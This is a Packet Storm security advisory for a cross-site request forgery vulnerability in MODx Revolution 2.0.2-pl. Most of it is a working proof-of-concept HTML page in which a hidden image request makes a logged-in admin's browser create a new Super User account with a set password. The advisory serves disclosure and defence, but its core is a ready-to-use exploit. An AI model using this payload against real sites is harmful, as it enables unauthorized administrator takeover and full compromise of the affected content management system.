MODx Revolution version 2.0.2-pl suffers from a cross site request forgery vulnerability.
2943b4c8fc23b2332afd145ad28e67df8ac9ea86eed676c968f344339601d6b0<!------------------------------------------------------------------------
# Software................MODx Revolution 2.0.2-pl
# Vulnerability...........Cross-site Request Forgery
# Download................http://modxcms.com
# Release Date............9/28/2010
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................John Leitch
# Site....................http://www.johnleitch.net/
# Email...................john.leitch5@gmail.com
# ------------------------------------------------------------------------
#
# --Description--
#
# A cross-site request forgery vulnerability in MODx Revolution 2.0.2-pl
# can be exploited to create a new admin.
#
#
# --PoC-->
<html>
<body>
<img src="http://localhost/modx/connectors/security/user.php?action=create&modx-ab-stay=&groups=%5B%7B%22usergroup%22%3A%221%22%2C%22role%22%3A%222%22%2C%22member%22%3A%22%22%2C%22rolename%22%3A%22Super%20User%22%2C%22name%22%3A%22Administrator%22%2C%22menu%22%3Anull%7D%5D&extended=%7B%7D&HTTP_MODAUTH=modx4ca298fc3d92e9.21874888&id=0&newpassword=false&modx-user-fs-newpassword-checkbox=on&passwordnotifymethod=s&passwordgenmethod=spec&specifiedpassword=Password1&confirmpassword=Password1&username=new_admin&active=1&fullname=&email=x%40x.com&phone=&mobilephone=&address=&city=&fax=&state=&zip=&country=&website=&dob=&gender=&comment=&failedlogincount=&blockeduntil=&blockedafter=&extended_name=&extended_value=&extended_id=" />
</body>
</html>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed